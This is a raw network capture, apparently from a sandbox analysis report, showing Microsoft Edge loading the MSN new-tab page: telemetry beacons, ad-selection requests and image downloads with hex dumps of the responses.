2024-11-25 23:25:49 UTC	1175	OUT	GET /c.gif?rnd=1732577146765&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a83a3db270ec46f296fce94d1b2a9496&activityId=a83a3db270ec46f296fce94d1b2a9496&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1
2024-11-25 23:25:50 UTC	1108	IN	HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Location: https://c.bing.com/c.gif?rnd=1732577146765&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a83a3db270ec46f296fce94d1b2a9496&activityId=a83a3db270ec46f296fce94d1b2a9496&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=5D1A4457261E4178B59F6A60663A50BE&RedC=c.msn.com&MXFR=0675AFABBF8562701E27BAE9BE8263C5 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=0675AFABBF8562701E27BAE9BE8263C5; domain=.msn.com; expires=Sat, 20-Dec-2025 23:25:50 GMT; path=/; SameSite=None; Secure; Priority=High; Date: Mon, 25 Nov 2024 23:25:49 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.6	49893	23.96.180.189	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:49 UTC	1067	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=0675AFABBF8562701E27BAE9BE8263C5&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=a5f4f3d592b04007d4765a3693f878c1 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1
2024-11-25 23:25:50 UTC	674	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 297 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:49 GMT Connection: close
2024-11-25 23:25:50 UTC	297	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.6	49890	51.104.15.253	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:49 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577146763&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3734 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1
2024-11-25 23:25:49 UTC	3734	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 35 54 32 33 3a 32 35 3a 34 36 2e 37 35 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 33 61 37 61 62 31 2d 35 63 61 37 2d 34 62 36 31 2d 39 66 36 64 2d 38 33 30 63 62 61 61 61 33 38 34 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 37 38 38 37 33 38 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-25T23:25:46.759Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"b83a7ab1-5ca7-4b61-9f6d-830cbaaa384c","epoch":"2078873817"},"app":{"locale
2024-11-25 23:25:50 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=33b288b0d8d046c1971c20f4b7ab61da&HASH=33b2&LV=202411&V=4&LU=1732577150093; Domain=.microsoft.com; Expires=Tue, 25 Nov 2025 23:25:50 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=f8c3bfcad7634f7db4334e5a1dd2fe3b; Domain=.microsoft.com; Expires=Mon, 25 Nov 2024 23:55:50 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3330 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 25 Nov 2024 23:25:50 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.6	49898	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:50 UTC	634	OUT	GET /tenant/amp/entityid/BB1msySs.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:50 UTC	519	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msySs Last-Modified: Sat, 23 Nov 2024 05:01:33 GMT X-Source-Length: 78248 X-Datacenter: westus X-ActivityId: b8266516-df6d-41e7-8430-40cb1534c490 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 78248 Cache-Control: public, max-age=192888 Expires: Thu, 28 Nov 2024 05:00:38 GMT Date: Mon, 25 Nov 2024 23:25:50 GMT Connection: close
2024-11-25 23:25:50 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-25 23:25:50 UTC	16384	IN	Data Raw: 14 20 46 66 2a eb 92 93 f4 bc ec d6 a9 64 60 b7 6c 7d 45 ba 12 20 e1 d1 d0 23 d4 05 47 9b b9 9c 8d b6 d5 cb f5 29 35 d0 02 b2 ad 9a 88 9a 8a b6 d0 50 e9 de f7 c6 00 18 11 cd b0 f5 0f 0f 86 38 f6 ec 65 89 5c e7 5e 4d 32 56 6a 59 aa 94 01 aa 0b 2d 28 e2 10 68 01 af 16 a5 14 aa 87 cb 83 af 51 f0 dd ea 8f 93 74 3d c0 c6 13 e6 dc 12 f5 31 49 fd db d5 05 40 00 36 68 74 53 22 61 95 06 75 e0 c4 87 b1 46 c9 04 e7 a7 07 01 9a 38 74 67 84 a4 6d f7 2c 11 a2 25 96 7c 9e 08 00 52 3e e5 d6 b9 72 68 1b 4a c4 dd 0d 55 cc 23 0a 5d 7a 9c d8 86 c7 64 6a 64 3d 86 51 0f 4b 45 18 19 96 0e 34 32 4b 07 25 df e9 fa 2b dd 49 94 8c 29 fd 6a a2 7c b7 f2 7a 24 49 ce 2f bf d0 fe 5f e2 c5 cb a0 84 4d 13 fa bf fd 9f bb ee 58 fc b6 c5 88 24 1b 8a dd 59 79 27 2e f9 7d 52 ed 21 a5 d4 1e 19 Data Ascii: Ff*d`l}E #G)5P8e\^M2VjY-(hQt=1I@6htS"auF8tgm,%\|R>rhJU#]zdjd=QKE42K%+I)j\|z$I/_MX$Yy'.}R!
2024-11-25 23:25:50 UTC	3255	IN	Data Raw: 55 f4 89 6f 4a 27 3e 4c c0 c8 0d 5d 80 8d 72 03 b4 b9 6c b4 84 8b 63 c8 69 2d 6b 5e 1d 40 e0 d7 76 f8 c9 1d ff 00 07 45 da 44 39 25 84 11 51 2c 19 a4 15 3b 69 e9 96 64 9a 01 bf c1 d5 a4 67 4d 94 c5 5f a0 e8 bf 2e 37 54 3c 48 1b 5b 26 0a a9 3d b5 2f bb 62 c5 8b 16 53 70 00 4a 85 49 82 a9 3c c5 07 2d 1f 29 07 0a c2 bc 45 7a 55 3e 91 51 c4 3c dc ae eb 06 ca 29 6b 93 a2 bb b6 ac cf 4c a4 89 0a 11 a1 4c ee ed f4 97 13 6a e5 d4 85 95 29 43 d0 77 50 3f 48 30 77 8a ba 97 bc 2e aa ee 24 11 89 59 e3 4c 9a 9c d2 af 4d 4c 99 99 0c 2c af f0 ea 5d ab e9 52 8d b2 4a 02 44 2a 66 3e a1 48 8d 5e 75 83 54 f2 77 3a 8f c4 94 15 95 e0 50 8f 44 8f b6 af 8c b5 5c ea 55 17 84 25 53 84 98 0a 00 56 0b e8 45 bb 8a 49 1e 92 04 9c 55 54 d7 7c c5 1a 3f 33 42 15 65 0a 23 0a d4 ac 24 d7 Data Ascii: UoJ'>L]rlci-k^@vED9%Q,;idgM_.7T<H[&=/bSpJI<-)EzU>Q<)kLLj)CwP?H0w.$YLML,]RJD*f>H^uTw:PD\U%SVEIUT\|?3Be#$
2024-11-25 23:25:50 UTC	16384	IN	Data Raw: ef d1 22 d5 12 80 68 22 4e 42 93 52 74 03 37 12 74 69 05 6e cc b4 99 0a 5a 8c 24 56 be ff 00 07 ce bd 7b 18 01 3e 94 0c 87 ff 00 91 e2 ee 5c 59 bd 16 ed fd 00 e7 aa ce f1 b6 c3 bd af a5 e8 95 72 e4 98 81 99 3a 79 6a 5c 2a 59 66 ce dd 25 e6 cd e9 ba 52 b1 8b 24 9a f1 f2 0f b7 64 78 67 0a 12 39 ce 54 cf 9f d9 96 28 f4 a4 70 a6 67 f6 1e ee bd eb bf 86 40 48 9c 4a 3e a3 b4 68 1c e6 45 e2 28 0b d7 05 c5 14 e0 52 88 98 3b 9d cf 07 73 a4 ba 14 0d a5 d0 a2 90 6b 4d dd 4b 0b b7 eb 5a 8e 7b cc 4d 64 d3 bd d8 b6 84 15 15 09 af 72 a3 5d cf 7b a3 3e 36 52 eb 6e 99 4a 52 8c 40 11 5d 1f 22 4f a9 24 0a d7 8c cc be df 55 71 20 11 fd 3a 6e f8 49 42 96 26 49 3b fc 5b 5a 12 f5 ea 2a e4 20 c6 45 a1 2b ce 6a 19 2c e2 35 da 1a a2 9c 5e a8 c1 bc 8c a2 b8 3d 0a 29 cb 5f 93 10 e4 Data Ascii: "h"NBRt7tinZ$V{>\Yr:yj\Yf%R$dxg9T(pg@HJ>hE(R;skMKZ{Mdr]{>6RnJR@]"O$Uq :nIB&I;[Z E+j,5^=)_
2024-11-25 23:25:51 UTC	16384	IN	Data Raw: 21 e6 be 13 b8 ff 00 a6 bc 3f 33 5f f6 fb 4b fa bd ff 00 91 ef cd c3 b8 63 e2 1d c3 f9 bd cf ce 16 7e 8b 49 1c 54 a2 af 61 01 d4 57 e6 9d 4a 84 02 84 f1 09 af b9 2f 65 f0 12 e4 8c 5f c6 c1 70 6c fa 91 b8 46 dd ee 78 a0 0a c0 ff 00 c8 3f 92 1e b7 aa 56 77 97 e4 63 ed 0e 92 96 a5 fd 4a 52 b9 92 7e ee ff 00 f1 cb 8c fc 17 ea 64 ff 00 c8 2e 10 f1 67 d8 7f 19 64 e5 76 d1 ff 00 cd 3f 16 f3 7b 0d 55 00 6e 48 03 dd fc 4d e9 24 e6 49 e6 db ff 00 1d 1e 13 7e 1f a9 3f f9 07 c7 b6 bc 7f 43 ed 88 be 15 54 94 9e 44 1f b3 67 88 78 3f 87 02 52 65 24 a4 f0 31 f6 77 7f 1b d5 61 28 f1 ee 14 9d 31 1f be 7e ef 27 fe 2f f6 f7 17 9a 2e 3f e4 63 c7 b6 fc 99 f5 a5 f5 96 ad c8 55 eb 49 8c e4 81 f3 7a 7a ab 54 ff 00 96 dd 44 e7 a6 ef e2 d3 2e 49 dc bd 97 f8 c8 7f f4 97 82 32 7f e4 Data Ascii: !?3_Kc~ITaWJ/e_plFx?VwcJR~d.gdv?{UnHM$I~?CTDgx?Re$1wa(1~'/.?cUIzzTD.I2
2024-11-25 23:25:51 UTC	7952	IN	Data Raw: 5a 9e 30 07 48 62 65 ad ec 96 01 b2 c6 5e cb 8d 81 1e 3d 78 c0 23 c8 7a e3 00 f5 80 03 b3 13 01 a8 2d 03 41 f7 6c c4 0e 56 e7 c8 07 e7 9e b5 98 17 39 7c 99 ca 8e ad 25 2a d1 38 67 b6 cd 32 b1 fc 95 e5 47 54 4d d6 a5 ea c6 67 b9 d6 26 38 79 7e ee bf e2 10 93 ea 93 cd 45 92 ba 9b 71 f4 0f 72 dd 3e 84 ee 5d 4b 02 e0 fd 44 b7 8b 86 28 0f 93 e4 1e a9 23 24 ab fc a0 0f 79 2e c2 3a b4 ea 85 7f 9b f6 63 8b e8 0a 6b f7 1d 71 88 ff 00 02 d9 87 80 ef 7c e1 d4 21 59 63 ed e6 1a 17 71 5a 28 0f f1 1f 81 79 6c 66 bf 51 57 52 d5 cb 4b 26 8a 48 6a 4d a5 a7 f9 4f 93 14 5d 3f ac 1e 43 e2 ed 62 51 19 fd be 0e b2 b0 2c 4b 26 63 b8 98 af b3 3f 1d 7d 83 ae 4a f8 f9 d0 36 00 08 f5 18 66 07 9e 03 05 e5 1e df 06 58 94 ad 5d 35 a6 da b2 59 1d b9 3a fe 1c 7f ea 92 dd 22 77 35 cf cc Data Ascii: Z0Hbe^=x#z-AlV9\|%*8g2GTMg&8y~Eqr>]KD(#$y.:ckq\|!YcqZ(ylfQWRK&HjMO]?CbQ,K&c?}J6fX]5Y:"w5
2024-11-25 23:25:51 UTC	2024	IN	Data Raw: 75 db 05 46 50 20 69 88 57 bf 57 0a 5b b1 23 47 0d b9 88 0a eb 2f 5c 22 56 10 3f 4c 62 3e 74 7d 1f c4 5b 28 f5 90 08 1f c9 18 49 ee 26 7b 9f 30 05 5a 04 61 93 95 12 6b e7 87 e6 ea a8 29 5f fa 65 27 b8 9f f3 55 9b 22 f9 57 a0 29 ca 3c db f5 3b 09 ea 02 86 14 e0 51 dc c2 4c 70 a0 2c d0 85 55 58 b1 45 42 7b 03 22 ba 17 c6 4f 4c b2 6a 92 37 25 49 11 f1 70 23 09 13 8d 43 2a 12 9d 72 13 15 e0 cd 8b 83 1a 9c b8 c4 b7 7e f5 c4 28 61 05 07 fc 3f b3 af e2 f5 57 29 ea 8f e9 48 4f 79 80 fa a7 02 00 11 70 c0 14 3f c4 ed ea 99 75 ee 29 24 24 e0 5e 7a ab e0 d4 5f f6 af 52 a5 17 ae f7 e8 8a b6 fa 85 d9 a2 a0 9d 8a bd f8 f7 ba f7 06 23 27 08 e0 90 19 5c 20 54 00 77 06 0f ca 5a 85 e5 4f a4 04 8d 87 c5 ea 97 14 73 b7 c1 f9 09 29 60 68 fa 98 97 70 1c 42 ca 84 4e 92 3c c5 5d Data Ascii: uFP iWW[#G/\"V?Lb>t}[(I&{0Zak)_e'U"W)<;QLp,UXEB{"OLj7%Ip#C*r~(a?W)HOyp?u)$$^z_R#'\ TwZOs)`hpBN<]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.6	49901	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:50 UTC	634	OUT	GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:50 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Tue, 19 Nov 2024 01:11:09 GMT X-Datacenter: westus X-ActivityId: d1332dc8-9c45-4f85-a99f-4fe76a720ba2 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL X-Source-Length: 1658 Content-Length: 1658 Cache-Control: public, max-age=222226 Expires: Thu, 28 Nov 2024 13:09:36 GMT Date: Mon, 25 Nov 2024 23:25:50 GMT Connection: close
2024-11-25 23:25:50 UTC	1658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H\|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.6	49897	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:50 UTC	633	OUT	GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:50 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Mon, 11 Nov 2024 13:51:58 GMT X-Datacenter: northeu X-ActivityId: 03b090a8-ff0d-477a-9433-19affde5f1c7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK X-Source-Length: 1218 Content-Length: 1218 Cache-Control: public, max-age=354609 Expires: Sat, 30 Nov 2024 01:55:59 GMT Date: Mon, 25 Nov 2024 23:25:50 GMT Connection: close
2024-11-25 23:25:50 UTC	1218	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.6	49900	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
